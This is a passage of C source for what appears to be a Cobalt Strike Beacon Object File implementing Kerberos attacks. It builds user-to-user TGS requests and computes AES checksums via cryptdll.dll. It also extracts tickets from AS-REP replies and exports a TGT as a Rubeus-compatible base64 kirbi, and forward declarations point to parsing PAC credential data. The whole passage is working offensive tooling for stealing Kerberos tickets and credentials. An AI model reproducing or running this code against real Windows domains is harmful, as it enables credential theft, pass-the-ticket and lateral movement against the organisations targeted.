    *outLen = outputSize;
    FreeLibrary(hCryptDll);
    return output;
}

/*
 * =============================================================================
 * U2U - Kerberos Checksum (HMAC-SHA1-96-AES256)
 * =============================================================================
 */

typedef struct _KERB_CHECKSUM {
    int Type;
    int Size;
    int Flag;
    void* Initialize;
    void* Sum;
    void* Finalize;
    void* Finish;
    void* InitializeEx;
    void* InitializeEx2;
} KERB_CHECKSUM;

typedef int (WINAPI *KERB_CHECKSUM_InitializeEx)(BYTE* key, int keySize, int keyUsage, void** pContext);
typedef int (WINAPI *KERB_CHECKSUM_Sum)(void* pContext, int dataSize, BYTE* data);
typedef int (WINAPI *KERB_CHECKSUM_Finalize)(void* pContext, BYTE* output);
typedef int (WINAPI *KERB_CHECKSUM_Finish)(void** pContext);

#define KERB_CHECKSUM_HMAC_SHA1_96_AES256 16

static BYTE* ComputeKerberosChecksum(BYTE* key, int keyLen, BYTE* data, int dataLen, int keyUsage, int* checksumLen) {
    HMODULE hCryptDll = NULL;
    CDLocateCheckSum_t pCDLocateCheckSum = NULL;
    KERB_CHECKSUM* pCheckSum = NULL;
    void* pContext = NULL;
    BYTE* output = NULL;
    int status;

    hCryptDll = LoadLibraryA("cryptdll.dll");
    if (!hCryptDll) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to load cryptdll.dll for checksum");
        return NULL;
    }

    pCDLocateCheckSum = (CDLocateCheckSum_t)GetProcAddress(hCryptDll, "CDLocateCheckSum");
    if (!pCDLocateCheckSum) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to find CDLocateCheckSum");
        FreeLibrary(hCryptDll);
        return NULL;
    }

    status = pCDLocateCheckSum(KERB_CHECKSUM_HMAC_SHA1_96_AES256, (void**)&pCheckSum);
    if (status != 0 || !pCheckSum) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CDLocateCheckSum failed: 0x%X", status);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    /* Get function pointers */
    KERB_CHECKSUM_InitializeEx initExFunc = (KERB_CHECKSUM_InitializeEx)pCheckSum->InitializeEx;
    KERB_CHECKSUM_Sum sumFunc = (KERB_CHECKSUM_Sum)pCheckSum->Sum;
    KERB_CHECKSUM_Finalize finalizeFunc = (KERB_CHECKSUM_Finalize)pCheckSum->Finalize;
    KERB_CHECKSUM_Finish finishFunc = (KERB_CHECKSUM_Finish)pCheckSum->Finish;

    /* Initialize with key */
    status = initExFunc(key, keyLen, keyUsage, &pContext);
    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Checksum InitializeEx failed: 0x%X", status);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    /* Sum the data */
    status = sumFunc(pContext, dataLen, data);
    if (status != 0) {
        finishFunc(&pContext);
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Checksum Sum failed: 0x%X", status);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    /* Finalize */
    *checksumLen = pCheckSum->Size;
    output = (BYTE*)malloc(*checksumLen);
    status = finalizeFunc(pContext, output);
    finishFunc(&pContext);

    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Checksum Finalize failed: 0x%X", status);
        free(output);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    FreeLibrary(hCryptDll);
    return output;
}

/*
 * =============================================================================
 * U2U - Forward Declarations
 * =============================================================================
 */

/* Forward declarations for functions defined later */
static BYTE* ExtractPacFromAuthData(BYTE* authData, int authDataLen, int* pacLen);
static const char* GetKrbErrorDesc(int code);
static void ParsePacCredentialData(BYTE* data, int dataLen);

/*
 * =============================================================================
 * KRB-CRED (kirbi) Builder - Rubeus compatible output
 * =============================================================================
 */

static void OutputKirbi(BYTE* ticket, int ticketLen, BYTE* sessionKey, int sessionKeyLen,
                        int encType, const char* user, const char* realm) {
    /*
     * Build minimal KRB-CRED structure for TGT export
     * KRB-CRED ::= [APPLICATION 22] SEQUENCE {
     *   pvno [0] INTEGER (5),
     *   msg-type [1] INTEGER (22),
     *   tickets [2] SEQUENCE OF Ticket,
     *   enc-part [3] EncryptedData { etype 0, cipher: EncKrbCredPart }
     * }
     */
    BYTE* kirbi = (BYTE*)malloc(ticketLen + sessionKeyLen + 1024);
    int kOffset = 0;
    int i;
    char* b64 = NULL;
    DWORD b64Len = 0;

    /* Build KrbCredInfo */
    BYTE* credInfo = (BYTE*)malloc(sessionKeyLen + 512);
    int ciOffset = 0;

    /* key [0] EncryptionKey { etype [0], keyvalue [1] } */
    BYTE keyContent[64];
    int keyOffset = 0;
    /* etype */
    keyContent[keyOffset++] = 0xA0;
    keyContent[keyOffset++] = 0x03;
    keyContent[keyOffset++] = 0x02;
    keyContent[keyOffset++] = 0x01;
    keyContent[keyOffset++] = (BYTE)encType;
    /* keyvalue */
    keyContent[keyOffset++] = 0xA1;
    keyContent[keyOffset++] = (BYTE)(sessionKeyLen + 2);
    keyContent[keyOffset++] = 0x04;
    keyContent[keyOffset++] = (BYTE)sessionKeyLen;
    memcpy(keyContent + keyOffset, sessionKey, sessionKeyLen);
    keyOffset += sessionKeyLen;

    credInfo[ciOffset++] = 0xA0; /* [0] key */
    credInfo[ciOffset++] = (BYTE)(keyOffset + 2);
    credInfo[ciOffset++] = 0x30;
    credInfo[ciOffset++] = (BYTE)keyOffset;
    memcpy(credInfo + ciOffset, keyContent, keyOffset);
    ciOffset += keyOffset;

    /* prealm [1] */
    int realmLen = (int)strlen(realm);
    credInfo[ciOffset++] = 0xA1;
    credInfo[ciOffset++] = (BYTE)(realmLen + 2);
    credInfo[ciOffset++] = 0x1B; /* GeneralString */
    credInfo[ciOffset++] = (BYTE)realmLen;
    memcpy(credInfo + ciOffset, realm, realmLen);
    ciOffset += realmLen;

    /* pname [2] PrincipalName { name-type [0] = 1, name-string [1] } */
    int userLen = (int)strlen(user);
    BYTE pnameContent[128];
    int pnOffset = 0;
    pnameContent[pnOffset++] = 0xA0;
    pnameContent[pnOffset++] = 0x03;
    pnameContent[pnOffset++] = 0x02;
    pnameContent[pnOffset++] = 0x01;
    pnameContent[pnOffset++] = 0x01; /* NT-PRINCIPAL */
    pnameContent[pnOffset++] = 0xA1;
    pnameContent[pnOffset++] = (BYTE)(userLen + 4);
    pnameContent[pnOffset++] = 0x30;
    pnameContent[pnOffset++] = (BYTE)(userLen + 2);
    pnameContent[pnOffset++] = 0x1B;
    pnameContent[pnOffset++] = (BYTE)userLen;
    memcpy(pnameContent + pnOffset, user, userLen);
    pnOffset += userLen;

    credInfo[ciOffset++] = 0xA2;
    credInfo[ciOffset++] = (BYTE)(pnOffset + 2);
    credInfo[ciOffset++] = 0x30;
    credInfo[ciOffset++] = (BYTE)pnOffset;
    memcpy(credInfo + ciOffset, pnameContent, pnOffset);
    ciOffset += pnOffset;

    /* srealm [8] */
    credInfo[ciOffset++] = 0xA8;
    credInfo[ciOffset++] = (BYTE)(realmLen + 2);
    credInfo[ciOffset++] = 0x1B;
    credInfo[ciOffset++] = (BYTE)realmLen;
    memcpy(credInfo + ciOffset, realm, realmLen);
    ciOffset += realmLen;

    /* sname [9] krbtgt/REALM */
    BYTE snameContent[128];
    int snOffset = 0;
    snameContent[snOffset++] = 0xA0;
    snameContent[snOffset++] = 0x03;
    snameContent[snOffset++] = 0x02;
    snameContent[snOffset++] = 0x01;
    snameContent[snOffset++] = 0x02; /* NT-SRV-INST */
    snameContent[snOffset++] = 0xA1;
    snameContent[snOffset++] = (BYTE)(6 + 2 + realmLen + 2 + 2);
    snameContent[snOffset++] = 0x30;
    snameContent[snOffset++] = (BYTE)(6 + 2 + realmLen + 2);
    snameContent[snOffset++] = 0x1B;
    snameContent[snOffset++] = 0x06;
    memcpy(snameContent + snOffset, "krbtgt", 6);
    snOffset += 6;
    snameContent[snOffset++] = 0x1B;
    snameContent[snOffset++] = (BYTE)realmLen;
    memcpy(snameContent + snOffset, realm, realmLen);
    snOffset += realmLen;

    credInfo[ciOffset++] = 0xA9;
    credInfo[ciOffset++] = (BYTE)(snOffset + 2);
    credInfo[ciOffset++] = 0x30;
    credInfo[ciOffset++] = (BYTE)snOffset;
    memcpy(credInfo + ciOffset, snameContent, snOffset);
    ciOffset += snOffset;

    /* Build EncKrbCredPart [APPLICATION 29] */
    BYTE* encCredPart = (BYTE*)malloc(ciOffset + 64);
    int ecpOffset = 0;
    /* ticket-info [0] SEQUENCE OF KrbCredInfo */
    encCredPart[ecpOffset++] = 0xA0;
    int seqLen = ciOffset + 2;
    if (seqLen < 128) {
        encCredPart[ecpOffset++] = (BYTE)seqLen;
    } else {
        encCredPart[ecpOffset++] = 0x82;
        encCredPart[ecpOffset++] = (BYTE)(seqLen >> 8);
        encCredPart[ecpOffset++] = (BYTE)(seqLen & 0xFF);
    }
    encCredPart[ecpOffset++] = 0x30; /* SEQUENCE OF */
    if (ciOffset < 128) {
        encCredPart[ecpOffset++] = (BYTE)ciOffset;
    } else {
        encCredPart[ecpOffset++] = 0x82;
        encCredPart[ecpOffset++] = (BYTE)(ciOffset >> 8);
        encCredPart[ecpOffset++] = (BYTE)(ciOffset & 0xFF);
    }
    /* KrbCredInfo SEQUENCE */
    int credInfoSeqOffset = ecpOffset;
    encCredPart[ecpOffset++] = 0x30;
    if (ciOffset < 128) {
        encCredPart[ecpOffset++] = (BYTE)ciOffset;
    } else {
        encCredPart[ecpOffset++] = 0x82;
        encCredPart[ecpOffset++] = (BYTE)(ciOffset >> 8);
        encCredPart[ecpOffset++] = (BYTE)(ciOffset & 0xFF);
    }
    memcpy(encCredPart + ecpOffset, credInfo, ciOffset);
    ecpOffset += ciOffset;

    /* Wrap in [APPLICATION 29] */
    BYTE* app29 = (BYTE*)malloc(ecpOffset + 8);
    int a29Offset = 0;
    app29[a29Offset++] = 0x7D; /* [APPLICATION 29] */
    if (ecpOffset + 2 < 128) {
        app29[a29Offset++] = (BYTE)(ecpOffset + 2);
    } else {
        app29[a29Offset++] = 0x82;
        app29[a29Offset++] = (BYTE)((ecpOffset + 2) >> 8);
        app29[a29Offset++] = (BYTE)((ecpOffset + 2) & 0xFF);
    }
    app29[a29Offset++] = 0x30;
    if (ecpOffset < 128) {
        app29[a29Offset++] = (BYTE)ecpOffset;
    } else {
        app29[a29Offset++] = 0x82;
        app29[a29Offset++] = (BYTE)(ecpOffset >> 8);
        app29[a29Offset++] = (BYTE)(ecpOffset & 0xFF);
    }
    memcpy(app29 + a29Offset, encCredPart, ecpOffset);
    a29Offset += ecpOffset;

    /* Build enc-part EncryptedData { etype [0] = 0, cipher [2] } */
    BYTE* encPart = (BYTE*)malloc(a29Offset + 32);
    int epOffset = 0;
    /* etype [0] INTEGER 0 */
    encPart[epOffset++] = 0xA0;
    encPart[epOffset++] = 0x03;
    encPart[epOffset++] = 0x02;
    encPart[epOffset++] = 0x01;
    encPart[epOffset++] = 0x00;
    /* cipher [2] OCTET STRING */
    encPart[epOffset++] = 0xA2;
    if (a29Offset + 2 < 128) {
        encPart[epOffset++] = (BYTE)(a29Offset + 2);
    } else {
        encPart[epOffset++] = 0x82;
        encPart[epOffset++] = (BYTE)((a29Offset + 2) >> 8);
        encPart[epOffset++] = (BYTE)((a29Offset + 2) & 0xFF);
    }
    encPart[epOffset++] = 0x04;
    if (a29Offset < 128) {
        encPart[epOffset++] = (BYTE)a29Offset;
    } else {
        encPart[epOffset++] = 0x82;
        encPart[epOffset++] = (BYTE)(a29Offset >> 8);
        encPart[epOffset++] = (BYTE)(a29Offset & 0xFF);
    }
    memcpy(encPart + epOffset, app29, a29Offset);
    epOffset += a29Offset;

    /* Wrap enc-part in SEQUENCE */
    BYTE* encPartSeq = (BYTE*)malloc(epOffset + 8);
    int epsOffset = 0;
    encPartSeq[epsOffset++] = 0x30;
    if (epOffset < 128) {
        encPartSeq[epsOffset++] = (BYTE)epOffset;
    } else {
        encPartSeq[epsOffset++] = 0x82;
        encPartSeq[epsOffset++] = (BYTE)(epOffset >> 8);
        encPartSeq[epsOffset++] = (BYTE)(epOffset & 0xFF);
    }
    memcpy(encPartSeq + epsOffset, encPart, epOffset);
    epsOffset += epOffset;

    /* Build KRB-CRED body */
    /* pvno [0] INTEGER 5 */
    kirbi[kOffset++] = 0xA0;
    kirbi[kOffset++] = 0x03;
    kirbi[kOffset++] = 0x02;
    kirbi[kOffset++] = 0x01;
    kirbi[kOffset++] = 0x05;
    /* msg-type [1] INTEGER 22 */
    kirbi[kOffset++] = 0xA1;
    kirbi[kOffset++] = 0x03;
    kirbi[kOffset++] = 0x02;
    kirbi[kOffset++] = 0x01;
    kirbi[kOffset++] = 0x16;
    /* tickets [2] SEQUENCE OF Ticket */
    kirbi[kOffset++] = 0xA2;
    if (ticketLen + 2 < 128) {
        kirbi[kOffset++] = (BYTE)(ticketLen + 2);
    } else {
        kirbi[kOffset++] = 0x82;
        kirbi[kOffset++] = (BYTE)((ticketLen + 2) >> 8);
        kirbi[kOffset++] = (BYTE)((ticketLen + 2) & 0xFF);
    }
    kirbi[kOffset++] = 0x30;
    if (ticketLen < 128) {
        kirbi[kOffset++] = (BYTE)ticketLen;
    } else {
        kirbi[kOffset++] = 0x82;
        kirbi[kOffset++] = (BYTE)(ticketLen >> 8);
        kirbi[kOffset++] = (BYTE)(ticketLen & 0xFF);
    }
    memcpy(kirbi + kOffset, ticket, ticketLen);
    kOffset += ticketLen;
    /* enc-part [3] */
    kirbi[kOffset++] = 0xA3;
    if (epsOffset < 128) {
        kirbi[kOffset++] = (BYTE)epsOffset;
    } else {
        kirbi[kOffset++] = 0x82;
        kirbi[kOffset++] = (BYTE)(epsOffset >> 8);
        kirbi[kOffset++] = (BYTE)(epsOffset & 0xFF);
    }
    memcpy(kirbi + kOffset, encPartSeq, epsOffset);
    kOffset += epsOffset;

    /* Wrap in SEQUENCE and [APPLICATION 22] */
    BYTE* final = (BYTE*)malloc(kOffset + 16);
    int fOffset = 0;
    final[fOffset++] = 0x76; /* [APPLICATION 22] */
    if (kOffset + 2 < 128) {
        final[fOffset++] = (BYTE)(kOffset + 2);
    } else {
        final[fOffset++] = 0x82;
        final[fOffset++] = (BYTE)((kOffset + 2) >> 8);
        final[fOffset++] = (BYTE)((kOffset + 2) & 0xFF);
    }
    final[fOffset++] = 0x30;
    if (kOffset < 128) {
        final[fOffset++] = (BYTE)kOffset;
    } else {
        final[fOffset++] = 0x82;
        final[fOffset++] = (BYTE)(kOffset >> 8);
        final[fOffset++] = (BYTE)(kOffset & 0xFF);
    }
    memcpy(final + fOffset, kirbi, kOffset);
    fOffset += kOffset;

    /* Convert to base64 */
    CryptBinaryToStringA(final, fOffset, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &b64Len);
    b64 = (char*)malloc(b64Len + 1);
    CryptBinaryToStringA(final, fOffset, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64, &b64Len);

    BeaconPrintf(CALLBACK_OUTPUT, "[+] TGT (kirbi, base64):");
    BeaconPrintf(CALLBACK_OUTPUT, "%s", b64);

    free(b64);
    free(final);
    free(kirbi);
    free(credInfo);
    free(encCredPart);
    free(app29);
    free(encPart);
    free(encPartSeq);
}

/*
 * =============================================================================
 * U2U - Extract Ticket from AS-REP
 * =============================================================================
 */

static BYTE* ExtractTicketFromAsRep(BYTE* asRep, int asRepLen, int* ticketLen) {
    int offset = 0;
    int length;

    /* Skip APPLICATION 11 tag */
    if (asRep[offset] == 0x6B) {
        offset++;
        offset += DecodeLength(asRep, offset, &length);
    }

    /* Skip outer SEQUENCE */
    if (asRep[offset] == 0x30) {
        offset++;
        offset += DecodeLength(asRep, offset, &length);
    }

    /* Find ticket [5] */
    while (offset < asRepLen - 10) {
        if (asRep[offset] == 0xA5) {
            offset++;
            offset += DecodeLength(asRep, offset, &length);

            /* The ticket starts here (APPLICATION 1) */
            *ticketLen = length;
            BYTE* ticket = (BYTE*)malloc(length);
            memcpy(ticket, asRep + offset, length);
            return ticket;
        } else if ((asRep[offset] & 0xE0) == 0xA0) {
            offset++;
            int skipLen;
            offset += DecodeLength(asRep, offset, &skipLen);
            offset += skipLen;
        } else {
            offset++;
        }
    }

    *ticketLen = 0;
    return NULL;
}

/*
 * =============================================================================
 * U2U - Build TGS-REQ Structures
 * =============================================================================
 */

/* Key usages for U2U */
#define KRB_KEY_USAGE_TGS_REQ_AUTH_CKSUM    6
#define KRB_KEY_USAGE_TGS_REQ_AUTH          7
#define KRB_KEY_USAGE_TGS_REP_ENCPART_SESSKEY 8
#define KRB_KEY_USAGE_TICKET_ENCPART        2

/* Global storage for U2U */
static BYTE* g_lastTgt = NULL;
static int g_lastTgtLen = 0;
static char g_lastUser[256] = {0};
static char g_lastRealm[256] = {0};
static char g_lastKdc[256] = {0};

/* Build U2U Authenticator */
static BYTE* BuildU2UAuthenticator(const char* user, const char* realm, BYTE* sessionKey, int sessionKeyLen,
                                    BYTE* reqBody, int reqBodyLen, int* outLen) {
    BYTE* authContent = (BYTE*)malloc(4096);
    int offset = 0;
    int i;

    /* authenticator-vno [0] INTEGER 5 */
    int vnoLen;
    BYTE* vno = BuildInteger(5, &vnoLen);
    int vnoTagLen;
    BYTE* vnoTag = BuildContextTag(0, vno, vnoLen, &vnoTagLen);
    memcpy(authContent + offset, vnoTag, vnoTagLen);
    offset += vnoTagLen;
    free(vno);
    free(vnoTag);

    /* crealm [1] GeneralString */
    int realmStrLen;
    BYTE* realmStr = BuildGeneralString(realm, &realmStrLen);
    int realmTagLen;
    BYTE* realmTag = BuildContextTag(1, realmStr, realmStrLen, &realmTagLen);
    memcpy(authContent + offset, realmTag, realmTagLen);
    offset += realmTagLen;
    free(realmStr);
    free(realmTag);

    /* cname [2] PrincipalName */
    int cnameLen;
    BYTE* cname = BuildPrincipalName(1, user, NULL, &cnameLen);
    int cnameTagLen;
    BYTE* cnameTag = BuildContextTag(2, cname, cnameLen, &cnameTagLen);
    memcpy(authContent + offset, cnameTag, cnameTagLen);
    offset += cnameTagLen;
    free(cname);
    free(cnameTag);

    /* cksum [3] Checksum - checksum of req-body */
    /* Checksum ::= SEQUENCE { cksumtype [0] Int32, checksum [1] OCTET STRING } */
    int checksumValueLen;
    BYTE* checksumValue = ComputeKerberosChecksum(sessionKey, sessionKeyLen, reqBody, reqBodyLen,
                                                   KRB_KEY_USAGE_TGS_REQ_AUTH_CKSUM, &checksumValueLen);
    if (checksumValue) {
        BYTE cksumContent[64];
        int cksumOffset = 0;

        /* cksumtype [0] INTEGER 16 */
        int ctypeLen;
        BYTE* ctype = BuildInteger(KERB_CHECKSUM_HMAC_SHA1_96_AES256, &ctypeLen);
        int ctypeTagLen;
        BYTE* ctypeTag = BuildContextTag(0, ctype, ctypeLen, &ctypeTagLen);
        memcpy(cksumContent + cksumOffset, ctypeTag, ctypeTagLen);
        cksumOffset += ctypeTagLen;
        free(ctype);
        free(ctypeTag);

        /* checksum [1] OCTET STRING */
        int cvalLen;
        BYTE* cval = BuildOctetString(checksumValue, checksumValueLen, &cvalLen);
        int cvalTagLen;
        BYTE* cvalTag = BuildContextTag(1, cval, cvalLen, &cvalTagLen);
        memcpy(cksumContent + cksumOffset, cvalTag, cvalTagLen);
        cksumOffset += cvalTagLen;
        free(cval);
        free(cvalTag);
        free(checksumValue);

        int cksumSeqLen;
        BYTE* cksumSeq = BuildSequence(cksumContent, cksumOffset, &cksumSeqLen);
        int cksumTagLen;
        BYTE* cksumTag = BuildContextTag(3, cksumSeq, cksumSeqLen, &cksumTagLen);
        memcpy(authContent + offset, cksumTag, cksumTagLen);
        offset += cksumTagLen;
        free(cksumSeq);
        free(cksumTag);
    }

    /* cusec [4] Microseconds */
    SYSTEMTIME st;
    GetSystemTime(&st);
    int cusec = st.wMilliseconds * 1000;
    int cusecLen;
    BYTE* cusecInt = BuildInteger(cusec, &cusecLen);
    int cusecTagLen;
    BYTE* cusecTag = BuildContextTag(4, cusecInt, cusecLen, &cusecTagLen);
    memcpy(authContent + offset, cusecTag, cusecTagLen);
    offset += cusecTagLen;
    free(cusecInt);
    free(cusecTag);

    /* ctime [5] KerberosTime */
    char timeStr[32];
    sprintf(timeStr, "%04d%02d%02d%02d%02d%02dZ",
            st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);
    int ctimeLen;
    BYTE* ctime = BuildGeneralizedTime(timeStr, &ctimeLen);
    int ctimeTagLen;
    BYTE* ctimeTag = BuildContextTag(5, ctime, ctimeLen, &ctimeTagLen);
    memcpy(authContent + offset, ctimeTag, ctimeTagLen);
    offset += ctimeTagLen;
    free(ctime);
    free(ctimeTag);

    /* Build Authenticator SEQUENCE */
    int authSeqLen;
    BYTE* authSeq = BuildSequence(authContent, offset, &authSeqLen);
    free(authContent);

    /* Wrap in APPLICATION 2 */
    BYTE* result = BuildApplication(2, authSeq, authSeqLen, outLen);
    free(authSeq);

    return result;
}

/* Build U2U AP-REQ */
static BYTE* BuildU2UApReq(BYTE* ticket, int ticketLen, BYTE* encAuthenticator, int encAuthLen, int* outLen) {
    BYTE* apReqContent = (BYTE*)malloc(ticketLen + encAuthLen + 256);
    int offset = 0;

    /* pvno [0] INTEGER 5 */
    int pvnoLen;
    BYTE* pvno = BuildInteger(5, &pvnoLen);
    int pvnoTagLen;
    BYTE* pvnoTag = BuildContextTag(0, pvno, pvnoLen, &pvnoTagLen);
    memcpy(apReqContent + offset, pvnoTag, pvnoTagLen);
    offset += pvnoTagLen;
    free(pvno);
    free(pvnoTag);

    /* msg-type [1] INTEGER 14 (AP-REQ) */
    int mtLen;
    BYTE* mt = BuildInteger(14, &mtLen);
    int mtTagLen;
    BYTE* mtTag = BuildContextTag(1, mt, mtLen, &mtTagLen);
    memcpy(apReqContent + offset, mtTag, mtTagLen);
    offset += mtTagLen;
    free(mt);
    free(mtTag);

    /* ap-options [2] BIT STRING (no options) */
    BYTE apOptions[] = { 0x00, 0x00, 0x00, 0x00 };
    int apOptBsLen;
    BYTE* apOptBs = BuildBitString(apOptions, 4, &apOptBsLen);
    int apOptTagLen;
    BYTE* apOptTag = BuildContextTag(2, apOptBs, apOptBsLen, &apOptTagLen);
    memcpy(apReqContent + offset, apOptTag, apOptTagLen);
    offset += apOptTagLen;
    free(apOptBs);
    free(apOptTag);

    /* ticket [3] Ticket */
    int ticketTagLen;
    BYTE* ticketTag = BuildContextTag(3, ticket, ticketLen, &ticketTagLen);
    memcpy(apReqContent + offset, ticketTag, ticketTagLen);
    offset += ticketTagLen;
    free(ticketTag);

    /* authenticator [4] EncryptedData */
    /* EncryptedData ::= SEQUENCE { etype [0], cipher [2] } */
    static BYTE encDataContent[4096];  /* static to avoid BOF stack overflow */
    int edOffset = 0;

    /* etype [0] INTEGER 18 (AES256) */
    int etypeLen;
    BYTE* etype = BuildInteger(ETYPE_AES256_CTS_HMAC_SHA1, &etypeLen);
    int etypeTagLen;
    BYTE* etypeTag = BuildContextTag(0, etype, etypeLen, &etypeTagLen);
    memcpy(encDataContent + edOffset, etypeTag, etypeTagLen);
    edOffset += etypeTagLen;
    free(etype);
    free(etypeTag);

    /* cipher [2] OCTET STRING */
    int cipherLen;
    BYTE* cipher = BuildOctetString(encAuthenticator, encAuthLen, &cipherLen);
    int cipherTagLen;
    BYTE* cipherTag = BuildContextTag(2, cipher, cipherLen, &cipherTagLen);
    memcpy(encDataContent + edOffset, cipherTag, cipherTagLen);
    edOffset += cipherTagLen;
    free(cipher);
    free(cipherTag);

    int encDataSeqLen;
    BYTE* encDataSeq = BuildSequence(encDataContent, edOffset, &encDataSeqLen);
    int encDataTagLen;
    BYTE* encDataTag = BuildContextTag(4, encDataSeq, encDataSeqLen, &encDataTagLen);
    memcpy(apReqContent + offset, encDataTag, encDataTagLen);
    offset += encDataTagLen;
    free(encDataSeq);
    free(encDataTag);

    /* Build AP-REQ SEQUENCE */
    int apReqSeqLen;
    BYTE* apReqSeq = BuildSequence(apReqContent, offset, &apReqSeqLen);
    free(apReqContent);

    /* Wrap in APPLICATION 14 */
    BYTE* result = BuildApplication(14, apReqSeq, apReqSeqLen, outLen);
    free(apReqSeq);

    return result;
}

/* Build U2U TGS-REQ */
static BYTE* BuildU2UTgsReq(const char* user, const char* realm, BYTE* ticket, int ticketLen,
                            BYTE* sessionKey, int sessionKeyLen, int* outLen) {
    BYTE* reqBodyContent = (BYTE*)malloc(4096);
    int rbOffset = 0;
    int i;

    /* kdc-options [0] BIT STRING */
    /* 0x40810018 = forwardable, renewable, canonicalize, renewable-ok, enc-tkt-in-skey */
    BYTE kdcOptions[] = { 0x40, 0x81, 0x00, 0x18 };
    int kdcOptBsLen;
    BYTE* kdcOptBs = BuildBitString(kdcOptions, 4, &kdcOptBsLen);
    int kdcOptTagLen;
    BYTE* kdcOptTag = BuildContextTag(0, kdcOptBs, kdcOptBsLen, &kdcOptTagLen);
    memcpy(reqBodyContent + rbOffset, kdcOptTag, kdcOptTagLen);
    rbOffset += kdcOptTagLen;
    free(kdcOptBs);
    free(kdcOptTag);

    /* realm [2] Realm */
    int realmStrLen;
    BYTE* realmStr = BuildGeneralString(realm, &realmStrLen);
    int realmTagLen;
    BYTE* realmTag = BuildContextTag(2, realmStr, realmStrLen, &realmTagLen);
    memcpy(reqBodyContent + rbOffset, realmTag, realmTagLen);
    rbOffset += realmTagLen;
    free(realmStr);
    free(realmTag);

    /* sname [3] PrincipalName - target is ourselves */
    int snameLen;
    BYTE* sname = BuildPrincipalName(1, user, NULL, &snameLen);
    int snameTagLen;
    BYTE* snameTag = BuildContextTag(3, sname, snameLen, &snameTagLen);
    memcpy(reqBodyContent + rbOffset, snameTag, snameTagLen);
    rbOffset += snameTagLen;
    free(sname);
    free(snameTag);

    /* till [5] KerberosTime - tomorrow */
    SYSTEMTIME st;
    GetSystemTime(&st);
    char tillStr[32];
    sprintf(tillStr, "%04d%02d%02d%02d%02d%02dZ",
            st.wYear, st.wMonth, st.wDay + 1, st.wHour, st.wMinute, st.wSecond);
    int tillLen;
    BYTE* till = BuildGeneralizedTime(tillStr, &tillLen);
    int tillTagLen;
    BYTE* tillTag = BuildContextTag(5, till, tillLen, &tillTagLen);
    memcpy(reqBodyContent + rbOffset, tillTag, tillTagLen);
    rbOffset += tillTagLen;
    free(till);
    free(tillTag);

    /* nonce [7] UInt32 */
    int nonce = g_nonce + 1;
    int nonceLen;
    BYTE* nonceInt = BuildInteger(nonce, &nonceLen);
    int nonceTagLen;
    BYTE* nonceTag = BuildContextTag(7, nonceInt, nonceLen, &nonceTagLen);
    memcpy(reqBodyContent + rbOffset, nonceTag, nonceTagLen);
    rbOffset += nonceTagLen;
    free(nonceInt);
    free(nonceTag);

    /* etype [8] SEQUENCE OF Int32 */
    BYTE etypeContent[32];
    int etOffset = 0;
    int aes256Len, aes128Len, rc4Len;
    BYTE* aes256 = BuildInteger(18, &aes256Len);
    memcpy(etypeContent + etOffset, aes256, aes256Len);
    etOffset += aes256Len;
    free(aes256);
    BYTE* aes128 = BuildInteger(17, &aes128Len);
    memcpy(etypeContent + etOffset, aes128, aes128Len);
    etOffset += aes128Len;
    free(aes128);
    BYTE* rc4 = BuildInteger(23, &rc4Len);
    memcpy(etypeContent + etOffset, rc4, rc4Len);
    etOffset += rc4Len;
    free(rc4);

    int etypeSeqLen;
    BYTE* etypeSeq = BuildSequence(etypeContent, etOffset, &etypeSeqLen);
    int etypeTagLen;
    BYTE* etypeTag = BuildContextTag(8, etypeSeq, etypeSeqLen, &etypeTagLen);
    memcpy(reqBodyContent + rbOffset, etypeTag, etypeTagLen);
    rbOffset += etypeTagLen;
    free(etypeSeq);
    free(etypeTag);

    /* additional-tickets [11] SEQUENCE OF Ticket - our TGT for U2U */
    int addTicketsSeqLen;
    BYTE* addTicketsSeq = BuildSequence(ticket, ticketLen, &addTicketsSeqLen);
    int addTicketsTagLen;
    BYTE* addTicketsTag = BuildContextTag(11, addTicketsSeq, addTicketsSeqLen, &addTicketsTagLen);
    memcpy(reqBodyContent + rbOffset, addTicketsTag, addTicketsTagLen);
    rbOffset += addTicketsTagLen;
    free(addTicketsSeq);
    free(addTicketsTag);

    /* Build req-body SEQUENCE */
    int reqBodySeqLen;
    BYTE* reqBodySeq = BuildSequence(reqBodyContent, rbOffset, &reqBodySeqLen);
    free(reqBodyContent);

    /* Build Authenticator with checksum of req-body */
    int authenticatorLen;
    BYTE* authenticator = BuildU2UAuthenticator(user, realm, sessionKey, sessionKeyLen,
                                                 reqBodySeq, reqBodySeqLen, &authenticatorLen);
    if (!authenticator) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build U2U authenticator");
        free(reqBodySeq);
        return NULL;
    }

    /* Encrypt authenticator with session key (key usage 7) */
    int encAuthLen;
    BYTE* encAuth = KerberosEncrypt(ETYPE_AES256_CTS_HMAC_SHA1, KRB_KEY_USAGE_TGS_REQ_AUTH,
                                     sessionKey, sessionKeyLen, authenticator, authenticatorLen, &encAuthLen);
    free(authenticator);

    if (!encAuth) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to encrypt U2U authenticator");
        free(reqBodySeq);
        return NULL;
    }

    /* Build AP-REQ */
    int apReqLen;
    BYTE* apReq = BuildU2UApReq(ticket, ticketLen, encAuth, encAuthLen, &apReqLen);
    free(encAuth);

    if (!apReq) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build U2U AP-REQ");
        free(reqBodySeq);
        return NULL;
    }

    /* Build PA-TGS-REQ (padata-type 1) */
    static BYTE padataContent[4096];  /* static to avoid BOF stack overflow */
    int paOffset = 0;

    /* padata-type [1] INTEGER 1 */
    int ptLen;
    BYTE* pt = BuildInteger(1, &ptLen);
    int ptTagLen;
    BYTE* ptTag = BuildContextTag(1, pt, ptLen, &ptTagLen);
    memcpy(padataContent + paOffset, ptTag, ptTagLen);
    paOffset += ptTagLen;
